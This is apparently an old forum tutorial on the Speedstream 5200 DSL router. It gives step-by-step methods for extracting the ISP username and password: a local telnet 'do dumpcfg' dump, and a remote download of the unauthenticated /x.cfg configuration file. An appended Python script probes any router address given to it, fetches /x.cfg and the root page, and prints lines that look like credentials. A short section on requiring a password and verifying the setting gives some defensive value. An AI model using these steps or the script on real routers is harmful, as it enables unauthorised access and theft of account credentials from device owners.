SPEEDSTREAM 5200


Brief Introduction

The Speedstream 5200 is a SOHO DSL router developed by Efficient Networks. Unlike many other SOHO routers (USR, LinkSys, Dlink, OCR, Cayman, etc.), which expose the ISP username/password on the client side, embedded in clear text in the web interface, the Speedstream keeps the password on the router side, as it should. In principle, then, one would need CLI access to the router to attempt to acquire the password.

Analysis

The folk at Efficient Networks built the router without the ability to accept remote connections to the CLI. Yes, it is crippled by the manufacturer: they have said the router was initially meant to be experimental, and as a result most firmware versions do not have this ability. To complicate things further, the router ships with more than one profile by default. The default admin profile is prof0 and can be accessed from :-
[url]http://speedstream/pfwizardj.cgi?code=EDIT&id=prof0[/url]

There are several separate profiles, for reasons that are not documented, but the other profile we need to pay attention to is the telnet profile, which is :-
[url]http://speedstream/pfwizardj.cgi?code=EDIT&id=prof1[/url]

NB: You need to set up/create/configure this profile in order to access the CLI of your router (locally).

Local

Once you have configured the telnet profile you can log in to the router's telnet server. Issuing "do dumpcfg" at the telnet prompt makes the router dump its entire configuration to the terminal. From there, scroll up to the top of the output and you will find the ISP username and password.

Note

For those of you who did some research, you will have come across a utility written by someone called IceGabe. His utility was created for people who need access to the router's FTP server. The same thing can now be done by hand with the telnet username and password, i.e. the prof1 page we discussed earlier. IceGabe's utility is intended for actual Speedstream users who need to connect to their own routers locally; the technique below is for penetration testers who need access, remotely, to a device that is otherwise inaccessible.

Remote

There are four files on the router, one of which is x.cfg. This is the router's configuration file, and the file we want. To get the configuration file off the router, simply request :-
[url]http://routerIPaddresshere/x.cfg[/url]
The browser will offer a file and ask whether you want to save it. Don't: cancel the download, remove x.cfg from the URL and hit enter again. One of two things will happen :-
1) Another file will be offered for saving. This time, save it somewhere you can find it again, then open it in notepad or your favourite text editor.

2) The router page will change and display the configuration right there. Scroll through the page and you will find all the necessary information.

Protection

You must configure your Speedstream router to ask for a password as soon as someone requests its IP address, not only when they request special/configuration pages. If the router demands the password before letting anyone see any page, the technique above does not apply. After changing the setting, verify it from another machine: requesting both http://routerIPaddresshere/x.cfg and http://routerIPaddresshere/ should produce an authentication prompt, not a file download or a page.
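As an added example, not code from the original post or from Efficient Networks, the following Python script replays the remote steps above (request /x.cfg, then the root page) and doubles as the check described in this Protection section: if both requests come back 401, the router is asking for the password up front. The router address 192.0.2.10 and the sample configuration text are constructed for the example; the real x.cfg layout is not shown on this page, so the script flags lines containing user/pass keywords rather than parsing a known format. The same keyword scan works on "do dumpcfg" output pasted from the telnet session.

```python
import re
import sys
import urllib.error
import urllib.request

# Constructed sample standing in for what a vulnerable router returns.
# This is NOT the real x.cfg layout, which is not documented here.
SAMPLE_CONFIG = """\
# router configuration (constructed sample, not real x.cfg output)
hostname speedstream
profile prof0 admin
ppp username someone@isp.example
ppp password hunter2
telnet user prof1
telnet pass letmein
dns 192.0.2.1
"""

# Words that usually mark a credential line in a dumped configuration.
CRED_PATTERN = re.compile(r"\b(user(name)?|pass(word|wd)?|login|secret)\b",
                          re.IGNORECASE)


def find_credential_lines(config_text):
    """Return (line_number, line) pairs that look like they carry credentials.

    Works on the body served at /x.cfg or /, and on 'do dumpcfg' output.
    """
    hits = []
    for number, line in enumerate(config_text.splitlines(), start=1):
        if CRED_PATTERN.search(line):
            hits.append((number, line.strip()))
    return hits


def http_get(url, timeout=5):
    """Fetch url and return (status, body_text); a 401 is returned, not raised."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


def probe_router(base_url, fetch=http_get):
    """Replay the manual steps: request /x.cfg, then the root page.

    `fetch` is injectable so the logic can be exercised offline. Returns the
    status of each request, whether the router demanded authentication before
    handing anything out, and any credential-looking lines from whichever
    response carried the configuration.
    """
    base = base_url.rstrip("/")
    cfg_status, cfg_body = fetch(base + "/x.cfg")
    root_status, root_body = fetch(base + "/")
    body = cfg_body if cfg_body.strip() else root_body
    return {
        "x.cfg": cfg_status,
        "root": root_status,
        "auth_required": cfg_status == 401 and root_status == 401,
        "credentials": find_credential_lines(body) if body else [],
    }


if __name__ == "__main__":
    # Usage: python probe.py http://192.0.2.10   (address is a placeholder)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.10"
    result = probe_router(target)
    print("x.cfg -> %s, / -> %s" % (result["x.cfg"], result["root"]))
    if result["auth_required"]:
        print("router asks for a password before serving anything: not exposed")
    for number, line in result["credentials"]:
        print("line %d: %s" % (number, line))
```

A router that is exposed returns 200 for at least one of the two requests and the credential lines show up in the output; a router configured as described in this section returns 401 for both and the script reports that nothing was served.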
Written By Snags aka Michael Thomas
*END* Feel free to post any constructive criticism, questions or suggestions on the forum. I will answer any question that I am knowledgeable enough to answer. Thank you.